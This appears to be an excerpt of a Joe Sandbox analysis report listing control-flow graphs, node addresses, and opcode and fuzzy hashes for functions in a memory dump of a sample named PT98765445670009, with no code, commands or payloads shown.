                                                  control_flow_graph 2313 2c37850-2c37d3e 2388 2c38290-2c382c5 2313->2388 2389 2c37d44-2c37d54 2313->2389 2393 2c382d1-2c382ef 2388->2393 2394 2c382c7-2c382cc 2388->2394 2389->2388 2390 2c37d5a-2c37d6a 2389->2390 2390->2388 2392 2c37d70-2c37d80 2390->2392 2392->2388 2395 2c37d86-2c37d96 2392->2395 2407 2c382f1-2c382fb 2393->2407 2408 2c38366-2c38372 2393->2408 2396 2c383b6-2c383bb 2394->2396 2395->2388 2397 2c37d9c-2c37dac 2395->2397 2397->2388 2399 2c37db2-2c37dc2 2397->2399 2399->2388 2400 2c37dc8-2c37dd8 2399->2400 2400->2388 2401 2c37dde-2c37dee 2400->2401 2401->2388 2403 2c37df4-2c37e04 2401->2403 2403->2388 2404 2c37e0a-2c37e1a 2403->2404 2404->2388 2406 2c37e20-2c3828f 2404->2406 2407->2408 2414 2c382fd-2c38309 2407->2414 2412 2c38374-2c38380 2408->2412 2413 2c38389-2c38395 2408->2413 2412->2413 2421 2c38382-2c38387 2412->2421 2422 2c38397-2c383a3 2413->2422 2423 2c383ac-2c383ae 2413->2423 2419 2c3830b-2c38316 2414->2419 2420 2c3832e-2c38331 2414->2420 2419->2420 2432 2c38318-2c38322 2419->2432 2425 2c38333-2c3833f 2420->2425 2426 2c38348-2c38354 2420->2426 2421->2396 2422->2423 2434 2c383a5-2c383aa 2422->2434 2423->2396 2504 2c383b0 call 2c38849 2423->2504 2425->2426 2437 2c38341-2c38346 2425->2437 2430 2c38356-2c3835d 2426->2430 2431 2c383bc-2c383de 2426->2431 2430->2431 2435 2c3835f-2c38364 2430->2435 2439 2c383e0 2431->2439 2440 2c383ee 2431->2440 2432->2420 2442 2c38324-2c38329 2432->2442 2434->2396 2435->2396 2437->2396 2439->2440 2443 2c383e7-2c383ec 2439->2443 2444 2c383f0-2c383f1 2440->2444 2442->2396 2443->2444 2504->2396
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbc0f0868224f0e9f7ae8118533c0304bfa14ddedb1ff3c0fb0d32f98ffed4e6
                                                  • Instruction ID: 22d80d66d4a9df496c778e503405976e127bafd615c65d160cde354b35baf4bd
                                                  • Opcode Fuzzy Hash: fbc0f0868224f0e9f7ae8118533c0304bfa14ddedb1ff3c0fb0d32f98ffed4e6
                                                  • Instruction Fuzzy Hash: 66521F74E002198FEB65DBA4C860BAEBB72FF98300F1081A9D10AAB755CF355E46DF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C38849 Relevance: .5, Instructions: 503COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2753 2c38849-2c38865 2754 2c38871-2c3887d 2753->2754 2755 2c38867-2c3886c 2753->2755 2758 2c3887f-2c38881 2754->2758 2759 2c3888d-2c38892 2754->2759 2756 2c38c06-2c38c0b 2755->2756 2760 2c38889-2c3888b 2758->2760 2759->2756 2760->2759 2761 2c38897-2c388a3 2760->2761 2763 2c388b3-2c388b8 2761->2763 2764 2c388a5-2c388b1 2761->2764 2763->2756 2764->2763 2766 2c388bd-2c388c8 2764->2766 2768 2c38972-2c3897d 2766->2768 2769 2c388ce-2c388d9 2766->2769 2772 2c38983-2c38992 2768->2772 2773 2c38a20-2c38a2c 2768->2773 2774 2c388db-2c388ed 2769->2774 2775 2c388ef 2769->2775 2782 2c389a3-2c389b2 2772->2782 2783 2c38994-2c3899e 2772->2783 2784 2c38a2e-2c38a3a 2773->2784 2785 2c38a3c-2c38a4e 2773->2785 2776 2c388f4-2c388f6 2774->2776 2775->2776 2779 2c38916-2c3891b 2776->2779 2780 2c388f8-2c38907 2776->2780 2779->2756 2780->2779 2791 2c38909-2c38914 2780->2791 2793 2c389d6-2c389df 2782->2793 2794 2c389b4-2c389c0 2782->2794 2783->2756 2784->2785 2792 2c38a7c-2c38a87 2784->2792 2799 2c38a72-2c38a77 2785->2799 2800 2c38a50-2c38a5c 2785->2800 2791->2779 2797 2c38920-2c38929 2791->2797 2803 2c38b69-2c38b74 2792->2803 2804 2c38a8d-2c38a96 2792->2804 2805 2c389e1-2c389f3 2793->2805 2806 2c389f5 2793->2806 2807 2c389c2-2c389c7 2794->2807 2808 2c389cc-2c389d1 2794->2808 2813 2c38935-2c38944 2797->2813 2814 2c3892b-2c38930 2797->2814 2799->2756 2818 2c38a68-2c38a6d 2800->2818 2819 2c38a5e-2c38a63 2800->2819 2822 2c38b76-2c38b80 2803->2822 2823 2c38b9e-2c38bad 2803->2823 2820 2c38a98-2c38aaa 2804->2820 2821 2c38aac 2804->2821 2810 2c389fa-2c389fc 2805->2810 2806->2810 2807->2756 2808->2756 2810->2773 2816 2c389fe-2c38a0a 2810->2816 2831 2c38946-2c38952 2813->2831 2832 2c38968-2c3896d 2813->2832 2814->2756 2833 2c38a16-2c38a1b 2816->2833 2834 2c38a0c-2c38a11 2816->2834 2818->2756 2819->2756 2824 2c38ab1-2c38ab3 2820->2824 2821->2824 2839 2c38b82-2c38b8e 2822->2839 2840 2c38b97-2c38b9c 2822->2840 2836 2c38c01 2823->2836 2837 2c38baf-2c38bbe 2823->2837 2829 2c38ac3 2824->2829 2830 2c38ab5-2c38ac1 2824->2830 2838 2c38ac8-2c38aca 2829->2838 2830->2838 2846 2c38954-2c38959 2831->2846 2847 2c3895e-2c38963 2831->2847 2832->2756 2833->2756 2834->2756 2836->2756 2837->2836 2851 2c38bc0-2c38bd8 2837->2851 2843 2c38ad6-2c38ae9 2838->2843 2844 2c38acc-2c38ad1 2838->2844 2839->2840 2850 2c38b90-2c38b95 2839->2850 2840->2756 2852 2c38b21-2c38b2b 2843->2852 2853 2c38aeb 2843->2853 2844->2756 2846->2756 2847->2756 2850->2756 2865 2c38bfa-2c38bff 2851->2865 2866 2c38bda-2c38bf8 2851->2866 2859 2c38b4a-2c38b56 2852->2859 2860 2c38b2d-2c38b39 call 2c382b8 2852->2860 2854 2c38aee-2c38aff call 2c382b8 2853->2854 2862 2c38b01-2c38b04 2854->2862 2863 2c38b06-2c38b0b 2854->2863 2870 2c38b58-2c38b5d 2859->2870 2871 2c38b5f 2859->2871 2874 2c38b40-2c38b45 2860->2874 2875 2c38b3b-2c38b3e 2860->2875 2862->2863 2868 2c38b10-2c38b13 2862->2868 2863->2756 2865->2756 2866->2756 2872 2c38b19-2c38b1f 2868->2872 2873 2c38c0c-2c38c34 2868->2873 2877 2c38b64 2870->2877 2871->2877 2872->2852 2872->2854 2880 2c38c40-2c38c4b 2873->2880 2881 2c38c36-2c38c3b 2873->2881 2874->2756 2875->2859 2875->2874 2877->2756 2885 2c38cf3-2c38cfc 2880->2885 2886 2c38c51-2c38c5c 2880->2886 2883 2c38dc1-2c38dc5 2881->2883 2891 2c38d47-2c38d52 2885->2891 2892 2c38cfe-2c38d09 2885->2892 2889 2c38c72 2886->2889 2890 2c38c5e-2c38c70 2886->2890 2893 2c38c77-2c38c79 2889->2893 2890->2893 2899 2c38d54-2c38d66 2891->2899 2900 2c38d68 2891->2900 2901 2c38dbf 2892->2901 2902 2c38d0f-2c38d21 2892->2902 2895 2c38c7b-2c38c8a 2893->2895 2896 2c38cae-2c38cc0 2893->2896 2895->2896 2908 2c38c8c-2c38ca2 2895->2908 2896->2901 2907 2c38cc6-2c38cd4 2896->2907 2905 2c38d6d-2c38d6f 2899->2905 2900->2905 2901->2883 2902->2901 2911 2c38d27-2c38d2b 2902->2911 2905->2901 2910 2c38d71-2c38d80 2905->2910 2921 2c38ce0-2c38ce3 2907->2921 2922 2c38cd6-2c38cdb 2907->2922 2908->2896 2931 2c38ca4-2c38ca9 2908->2931 2917 2c38d82-2c38d8b 2910->2917 2918 2c38da8 2910->2918 2913 2c38d37-2c38d3a 2911->2913 2914 2c38d2d-2c38d32 2911->2914 2919 2c38d40-2c38d43 2913->2919 2920 2c38dc6-2c38df6 call 2c383d8 2913->2920 2914->2883 2932 2c38da1 2917->2932 2933 2c38d8d-2c38d9f 2917->2933 2925 2c38dad-2c38daf 2918->2925 2919->2911 2923 2c38d45 2919->2923 2940 2c38df8-2c38e0c 2920->2940 2941 2c38e0d-2c38e11 2920->2941 2921->2920 2924 2c38ce9-2c38cec 2921->2924 2922->2883 2923->2901 2924->2907 2929 2c38cee 2924->2929 2925->2901 2930 2c38db1-2c38dbd 2925->2930 2929->2901 2930->2883 2931->2883 2935 2c38da6 2932->2935 2933->2935 2935->2925
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7bae29fbc3c0bb03d6d919cce7b7b0e7ac6bf3548e15d0b7e8ab24d05403f30
                                                  • Instruction ID: 0c96036976dd1ba01620c2cacf9c0271a03709679f36ef52408f7622fbd04e4f
                                                  • Opcode Fuzzy Hash: b7bae29fbc3c0bb03d6d919cce7b7b0e7ac6bf3548e15d0b7e8ab24d05403f30
                                                  • Instruction Fuzzy Hash: 6EF1B1703056018FDB279B3AD958B797BA6AFC5744F184AAAF402CF3A1DB29CD41C781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C36EB8 Relevance: .5, Instructions: 477COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2943 2c36eb8-2c36eed 2944 2c36ef3-2c36f16 2943->2944 2945 2c3731c-2c37320 2943->2945 2954 2c36fc4-2c36fc8 2944->2954 2955 2c36f1c-2c36f29 2944->2955 2946 2c37322-2c37336 2945->2946 2947 2c37339-2c37347 2945->2947 2952 2c37349-2c3735e 2947->2952 2953 2c373b8-2c373cd 2947->2953 2963 2c37360-2c37363 2952->2963 2964 2c37365-2c37372 2952->2964 2965 2c373d4-2c373e1 2953->2965 2966 2c373cf-2c373d2 2953->2966 2956 2c37010-2c37019 2954->2956 2957 2c36fca-2c36fd8 2954->2957 2971 2c36f2b-2c36f36 2955->2971 2972 2c36f38 2955->2972 2960 2c3742f 2956->2960 2961 2c3701f-2c37029 2956->2961 2957->2956 2979 2c36fda-2c36ff5 2957->2979 2973 2c37434-2c37464 2960->2973 2961->2945 2969 2c3702f-2c37038 2961->2969 2967 2c37374-2c373b5 2963->2967 2964->2967 2968 2c373e3-2c3741e 2965->2968 2966->2968 3020 2c37425-2c3742c 2968->3020 2977 2c37047-2c37053 2969->2977 2978 2c3703a-2c3703f 2969->2978 2974 2c36f3a-2c36f3c 2971->2974 2972->2974 2996 2c37466-2c3747c 2973->2996 2997 2c3747d-2c37484 2973->2997 2974->2954 2980 2c36f42-2c36fa4 2974->2980 2977->2973 2983 2c37059-2c3705f 2977->2983 2978->2977 3003 2c37003 2979->3003 3004 2c36ff7-2c37001 2979->3004 3031 2c36fa6 2980->3031 3032 2c36faa-2c36fc1 2980->3032 2986 2c37306-2c3730a 2983->2986 2987 2c37065-2c37075 2983->2987 2986->2960 2991 2c37310-2c37316 2986->2991 3001 2c37077-2c37087 2987->3001 3002 2c37089-2c3708b 2987->3002 2991->2945 2991->2969 3005 2c3708e-2c37094 3001->3005 3002->3005 3006 2c37005-2c37007 3003->3006 3004->3006 3005->2986 3008 2c3709a-2c370a9 3005->3008 3006->2956 3009 2c37009 3006->3009 3015 2c37157-2c37182 call 2c36d00 * 2 3008->3015 3016 2c370af 3008->3016 3009->2956 3033 2c37188-2c3718c 3015->3033 3034 2c3726c-2c37286 3015->3034 3018 2c370b2-2c370c3 3016->3018 3018->2973 3022 2c370c9-2c370db 3018->3022 3022->2973 3024 2c370e1-2c370f9 3022->3024 3087 2c370fb call 2c37488 3024->3087 3088 2c370fb call 2c37498 3024->3088 3027 2c37101-2c37111 3027->2986 3030 2c37117-2c3711a 3027->3030 3035 2c37124-2c37127 3030->3035 3036 2c3711c-2c37122 3030->3036 3031->3032 3032->2954 3033->2986 3038 2c37192-2c37196 3033->3038 3034->2945 3056 2c3728c-2c37290 3034->3056 3035->2960 3039 2c3712d-2c37130 3035->3039 3036->3035 3036->3039 3041 2c37198-2c371a5 3038->3041 3042 2c371be-2c371c4 3038->3042 3043 2c37132-2c37136 3039->3043 3044 2c37138-2c3713b 3039->3044 3059 2c371a7-2c371b2 3041->3059 3060 2c371b4 3041->3060 3045 2c371c6-2c371ca 3042->3045 3046 2c371ff-2c37205 3042->3046 3043->3044 3047 2c37141-2c37145 3043->3047 3044->2960 3044->3047 3045->3046 3048 2c371cc-2c371d5 3045->3048 3049 2c37211-2c37217 3046->3049 3050 2c37207-2c3720b 3046->3050 3047->2960 3053 2c3714b-2c37151 3047->3053 3054 2c371d7-2c371dc 3048->3054 3055 2c371e4-2c371fa 3048->3055 3057 2c37223-2c37225 3049->3057 3058 2c37219-2c3721d 3049->3058 3050->3020 3050->3049 3053->3015 3053->3018 3054->3055 3055->2986 3062 2c37292-2c3729c call 2c35ba8 3056->3062 3063 2c372cc-2c372d0 3056->3063 3064 2c37227-2c37230 3057->3064 3065 2c3725a-2c3725c 3057->3065 3058->2986 3058->3057 3061 2c371b6-2c371b8 3059->3061 3060->3061 3061->2986 3061->3042 3062->3063 3076 2c3729e-2c372b3 3062->3076 3063->3020 3068 2c372d6-2c372da 3063->3068 3071 2c37232-2c37237 3064->3071 3072 2c3723f-2c37255 3064->3072 3065->2986 3066 2c37262-2c37269 3065->3066 3068->3020 3073 2c372e0-2c372ed 3068->3073 3071->3072 3072->2986 3079 2c372ef-2c372fa 3073->3079 3080 2c372fc 3073->3080 3076->3063 3084 2c372b5-2c372ca 3076->3084 3081 2c372fe-2c37300 3079->3081 3080->3081 3081->2986 3081->3020 3084->2945 3084->3063 3087->3027 3088->3027
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5290f854478e40d7f154f5f571ed17f85c178f1c6f803e7bea4f7162073ee31c
                                                  • Instruction ID: b87e8d4460708241f428d0ef4eeb1a4d43cb329abb8d277725818b5164fee6d8
                                                  • Opcode Fuzzy Hash: 5290f854478e40d7f154f5f571ed17f85c178f1c6f803e7bea4f7162073ee31c
                                                  • Instruction Fuzzy Hash: E7124C70A00249DFCB26CF69D984AAEFBF2BF88314F148959E849DB261D731ED45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C30C97 Relevance: .4, Instructions: 414COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3219 2c30c97-2c30cc0 3220 2c30cc2 3219->3220 3221 2c30cc7-2c30d32 call 2c3070c 3219->3221 3220->3221 3230 2c30d37 3221->3230 3231 2c30d40-2c30f2f call 2c3070c * 7 3230->3231 3277 2c30f37-2c30f5e call 2c31fc0 3231->3277 3363 2c30f61 call 2c33480 3277->3363 3364 2c30f61 call 2c3344b 3277->3364 3280 2c30f67-2c30f70 3365 2c30f73 call 2c33960 3280->3365 3366 2c30f73 call 2c3394f 3280->3366 3281 2c30f79-2c30fa3 3284 2c30fac-2c30faf call 2c34b31 3281->3284 3285 2c30fb5-2c30fdf 3284->3285 3288 2c30fe8 3285->3288 3369 2c30feb call 2c3b553 3288->3369 3370 2c30feb call 2c3b388 3288->3370 3371 2c30feb call 2c3b378 3288->3371 3289 2c30ff1-2c3101b 3292 2c31024 3289->3292 3293 2c31030-2c3106c 3292->3293 3296 2c31078 3293->3296 3297 2c31084-2c310c0 3296->3297 3300 2c310cc-2c310d2 call 2c3c1f0 3297->3300 3301 2c310d8-2c31114 3300->3301 3304 2c31120-2c31126 call 2c3c4d0 3301->3304 3305 2c3112c-2c31168 3304->3305 3308 2c31174-2c3117a call 2c3c7b1 3305->3308 3309 2c31180-2c311bc 3308->3309 3312 2c311c8-2c311ce call 2c3ca91 3309->3312 3313 2c311d4-2c3127f 3312->3313 3321 2c3128a-2c31296 call 2c3cd70 3313->3321 3322 2c3129c-2c312a8 3321->3322 3323 2c312b3-2c312bf call 2c3cd70 3322->3323 3324 2c312c5-2c312d1 3323->3324 3325 2c312dc-2c312e8 call 2c3cd70 3324->3325 3326 2c312ee-2c312fa 3325->3326 3327 2c31305-2c31311 call 2c3cd70 3326->3327 3328 2c31317-2c31323 3327->3328 3329 2c3132e-2c3133a call 2c3cd70 3328->3329 3330 2c31340-2c3134c 3329->3330 3331 2c31357-2c31363 call 2c3cd70 3330->3331 3332 2c31369-2c31375 3331->3332 3333 2c31380-2c3138c call 2c3cd70 3332->3333 3334 2c31392-2c3139e 3333->3334 3335 2c313a9-2c313b5 call 2c3cd70 3334->3335 3336 2c313bb-2c313c7 3335->3336 3337 2c313d2-2c313de call 2c3cd70 3336->3337 3338 2c313e4-2c313f0 3337->3338 3339 2c313fb-2c31407 call 2c3cd70 3338->3339 3340 2c3140d-2c314c0 3339->3340 3363->3280 3364->3280 3365->3281 3366->3281 3369->3289 3370->3289 3371->3289
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c63041244e42ce837c0445db85e47e3fa2041248c35485fdd9a2906ade06cd36
                                                  • Instruction ID: e7a26e726d4b17b26b405b6892ac56b940b9bd48d4fba314405e8c352469ea32
                                                  • Opcode Fuzzy Hash: c63041244e42ce837c0445db85e47e3fa2041248c35485fdd9a2906ade06cd36
                                                  • Instruction Fuzzy Hash: F522E579D40219CFCB55FF64E898A9DBBB6BF49301F108AA9D409AB358DB306D46CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C3A878 Relevance: .4, Instructions: 412COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3373 2c3a878-2c3a887 3374 2c3a88f-2c3a8a2 3373->3374 3375 2c3a88a call 2c3a820 3373->3375 3377 2c3a96b 3374->3377 3378 2c3a8a8-2c3a8ad 3374->3378 3375->3374 3380 2c3a970-2c3a9af 3377->3380 3378->3377 3379 2c3a8b3-2c3a8d2 3378->3379 3382 2c3a8d4-2c3a8dc 3379->3382 3383 2c3a91b-2c3a920 3379->3383 3386 2c3a9b1-2c3a9b4 3380->3386 3387 2c3a9b7-2c3a9bf 3380->3387 3382->3377 3385 2c3a8e2-2c3a8e5 3382->3385 3391 2c3a928-2c3a92f 3383->3391 3385->3377 3388 2c3a8eb-2c3a90a 3385->3388 3386->3387 3389 2c3a9c1-2c3a9c7 3387->3389 3390 2c3aa27-2c3aa2e 3387->3390 3388->3377 3418 2c3a90c-2c3a912 3388->3418 3389->3390 3394 2c3a9c9-2c3a9cf 3389->3394 3392 2c3ab33-2c3ab3c 3390->3392 3393 2c3aa34-2c3aa3b 3390->3393 3395 2c3a931-2c3a937 3391->3395 3396 2c3a95e-2c3a968 3391->3396 3398 2c3ab46-2c3ab49 3392->3398 3399 2c3ab3e-2c3ab44 3392->3399 3400 2c3aa41-2c3aa49 3393->3400 3401 2c3aaea-2c3aaf0 3393->3401 3402 2c3a9d5-2c3a9e2 3394->3402 3403 2c3ac59-2c3ac61 3394->3403 3395->3380 3404 2c3a939-2c3a956 3395->3404 3406 2c3ac54 3398->3406 3407 2c3ab4f-2c3ab5d 3398->3407 3399->3398 3405 2c3ab60-2c3ab64 3399->3405 3400->3406 3408 2c3aa4f-2c3aa58 3400->3408 3401->3403 3410 2c3aaf6-2c3ab00 3401->3410 3402->3403 3409 2c3a9e8-2c3aa10 3402->3409 3424 2c3ac63-2c3ac69 3403->3424 3425 2c3ac2f-2c3ac36 3403->3425 3404->3396 3414 2c3abe7-2c3abeb 3405->3414 3415 2c3ab6a-2c3ab73 3405->3415 3406->3403 3407->3405 3408->3403 3413 2c3aa5e-2c3aa91 3408->3413 3409->3406 3450 2c3aa16-2c3aa19 3409->3450 3410->3403 3416 2c3ab06-2c3ab22 3410->3416 3456 2c3aa93 3413->3456 3457 2c3aadb-2c3aae8 3413->3457 3420 2c3ac4a-2c3ac51 3414->3420 3421 2c3abed-2c3abf6 3414->3421 3415->3414 3422 2c3ab75-2c3ab7b 3415->3422 3451 2c3ab2a-2c3ab2d 3416->3451 3418->3380 3430 2c3a914-2c3a918 3418->3430 3421->3406 3432 2c3abf8-2c3abff 3421->3432 3422->3403 3433 2c3ab81-2c3ab8b 3422->3433 3427 2c3ac37-2c3ac38 3424->3427 3428 2c3ac6b-2c3ac8f 3424->3428 3425->3427 3441 2c3ac40-2c3ac43 3427->3441 3445 2c3ac91-2c3ac9c 3428->3445 3446 2c3ac9e-2c3aca2 3428->3446 3430->3383 3432->3420 3436 2c3ac01 3432->3436 3433->3403 3437 2c3ab91-2c3ab9e 3433->3437 3443 2c3ac04-2c3ac0c 3436->3443 3437->3403 3438 2c3aba4-2c3abcf 3437->3438 3438->3403 3475 2c3abd5-2c3abdd 3438->3475 3441->3406 3447 2c3ac45-2c3ac48 3441->3447 3443->3441 3448 2c3ac0e-2c3ac1a 3443->3448 3445->3446 3452 2c3acb4 3446->3452 3453 2c3aca4-2c3acb2 3446->3453 3447->3420 3447->3443 3448->3403 3455 2c3ac1c-2c3ac2d 3448->3455 3450->3406 3458 2c3aa1f-2c3aa25 3450->3458 3451->3392 3451->3406 3460 2c3acb6-2c3acb8 3452->3460 3453->3460 3455->3425 3461 2c3aa96-2c3aa9c 3456->3461 3457->3451 3458->3389 3458->3390 3464 2c3acba-2c3acbc 3460->3464 3465 2c3acbe-2c3acc6 3460->3465 3461->3403 3466 2c3aaa2-2c3aac3 3461->3466 3464->3465 3468 2c3ace9-2c3aceb 3465->3468 3469 2c3acc8-2c3acda 3465->3469 3466->3406 3484 2c3aac9-2c3aacd 3466->3484 3470 2c3ad19-2c3ad2a 3468->3470 3471 2c3aced-2c3acfa call 2c3a3a0 3468->3471 3469->3468 3480 2c3acdc-2c3ace7 3469->3480 3471->3470 3482 2c3acfc-2c3ad0b 3471->3482 3475->3406 3478 2c3abdf-2c3abe5 3475->3478 3478->3414 3478->3422 3480->3468 3482->3470 3487 2c3ad0d-2c3ad17 3482->3487 3484->3406 3485 2c3aad3-2c3aad9 3484->3485 3485->3457 3485->3461 3487->3470
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7f96312983c15b1aedaa51d610254887fd135c99324de6f31c712a37a3505beb
                                                  • Instruction ID: 91c48035da60e139f7a96c68bd50a850953c577c13c4b47f8bc728bc1b8599f2
                                                  • Opcode Fuzzy Hash: 7f96312983c15b1aedaa51d610254887fd135c99324de6f31c712a37a3505beb
                                                  • Instruction Fuzzy Hash: 30F14D71E00614CFCB05CF69D588AADBBF2FF88314B1A85A9E459AB361CB35EC51CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C30CA0 Relevance: .4, Instructions: 410COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3489 2c30ca0-2c30cc0 3490 2c30cc2 3489->3490 3491 2c30cc7-2c30f5e call 2c3070c * 8 call 2c31fc0 3489->3491 3490->3491 3623 2c30f61 call 2c33480 3491->3623 3624 2c30f61 call 2c3344b 3491->3624 3550 2c30f67-2c30f70 3625 2c30f73 call 2c33960 3550->3625 3626 2c30f73 call 2c3394f 3550->3626 3551 2c30f79-2c30fe8 call 2c34b31 3629 2c30feb call 2c3b553 3551->3629 3630 2c30feb call 2c3b388 3551->3630 3631 2c30feb call 2c3b378 3551->3631 3559 2c30ff1-2c31407 call 2c3c1f0 call 2c3c4d0 call 2c3c7b1 call 2c3ca91 call 2c3cd70 * 10 3610 2c3140d-2c314c0 3559->3610 3623->3550 3624->3550 3625->3551 3626->3551 3629->3559 3630->3559 3631->3559
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c002881acf599e6520ef04d04921571210e4522e9940ab09e1aa0e0621619e54
                                                  • Instruction ID: 95443afff9cab32e60250cc154b4e8cabf1dcecf1a1cfb6376e3ddc69988488b
                                                  • Opcode Fuzzy Hash: c002881acf599e6520ef04d04921571210e4522e9940ab09e1aa0e0621619e54
                                                  • Instruction Fuzzy Hash: 1822D579D40219CFCB55FF64E898A9DBBB6BF49301F108AA9D409AB358DB306D46CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C35700 Relevance: .3, Instructions: 326COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3752 2c35700-2c35722 3753 2c35724-2c35728 3752->3753 3754 2c35738-2c35743 3752->3754 3755 2c35750-2c35757 3753->3755 3756 2c3572a-2c35736 3753->3756 3757 2c357eb-2c35817 3754->3757 3758 2c35749-2c3574b 3754->3758 3760 2c35777-2c35780 3755->3760 3761 2c35759-2c35760 3755->3761 3756->3754 3756->3755 3766 2c3581e-2c35876 3757->3766 3759 2c357e3-2c357e8 3758->3759 3857 2c35782 call 2c356f0 3760->3857 3858 2c35782 call 2c35700 3760->3858 3761->3760 3763 2c35762-2c3576d 3761->3763 3765 2c35773-2c35775 3763->3765 3763->3766 3764 2c35788-2c3578a 3767 2c35792-2c3579a 3764->3767 3768 2c3578c-2c35790 3764->3768 3765->3759 3784 2c35885-2c35897 3766->3784 3785 2c35878-2c3587e 3766->3785 3771 2c357a9-2c357ab 3767->3771 3772 2c3579c-2c357a1 3767->3772 3768->3767 3770 2c357ad-2c357cc call 2c36168 3768->3770 3778 2c357e1 3770->3778 3779 2c357ce-2c357d7 3770->3779 3771->3759 3772->3771 3778->3759 3855 2c357d9 call 2c3a6b0 3779->3855 3856 2c357d9 call 2c3a76d 3779->3856 3781 2c357df 3781->3759 3787 2c3592b-2c3592d 3784->3787 3788 2c3589d-2c358a1 3784->3788 3785->3784 3853 2c3592f call 2c35ac8 3787->3853 3854 2c3592f call 2c35ab8 3787->3854 3789 2c358a3-2c358af 3788->3789 3790 2c358b1-2c358be 3788->3790 3796 2c358c0-2c358ca 3789->3796 3790->3796 3791 2c35935-2c3593b 3793 2c35947-2c3594e 3791->3793 3794 2c3593d-2c35943 3791->3794 3797 2c35945 3794->3797 3798 2c359a9-2c359f7 3794->3798 3801 2c358f7-2c358fb 3796->3801 3802 2c358cc-2c358db 3796->3802 3797->3793 3859 2c359f9 call 69d25e8 3798->3859 3860 2c359f9 call 69d23d1 3798->3860 3861 2c359f9 call 69d23e0 3798->3861 3804 2c35907-2c3590b 3801->3804 3805 2c358fd-2c35903 3801->3805 3813 2c358eb-2c358f5 3802->3813 3814 2c358dd-2c358e4 3802->3814 3804->3793 3806 2c3590d-2c35911 3804->3806 3808 2c35951-2c359a2 3805->3808 3809 2c35905 3805->3809 3810 2c35917-2c35929 3806->3810 3811 2c35a0f-2c35a33 3806->3811 3808->3798 3809->3793 3810->3793 3821 2c35a35-2c35a37 3811->3821 3822 2c35a39-2c35a3b 3811->3822 3813->3801 3814->3813 3823 2c35ab1-2c35ab4 3821->3823 3824 2c35a3d-2c35a41 3822->3824 3825 2c35a4c-2c35a4e 3822->3825 3829 2c35a43-2c35a45 3824->3829 3830 2c35a47-2c35a4a 3824->3830 3831 2c35a61-2c35a67 3825->3831 3832 2c35a50-2c35a54 3825->3832 3829->3823 3830->3823 3836 2c35a92-2c35a94 3831->3836 3837 2c35a69-2c35a90 3831->3837 3833 2c35a56-2c35a58 3832->3833 3834 2c35a5a-2c35a5f 3832->3834 3833->3823 3834->3823 3839 2c35a9b-2c35a9d 3836->3839 3837->3839 3843 2c35aa3-2c35aa5 3839->3843 3844 2c35a9f-2c35aa1 3839->3844 3840 2c359ff-2c35a08 3840->3811 3845 2c35aa7-2c35aac 3843->3845 3846 2c35aae 3843->3846 3844->3823 3845->3823 3846->3823 3853->3791 3854->3791 3855->3781 3856->3781 3857->3764 3858->3764 3859->3840 3860->3840 3861->3840
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
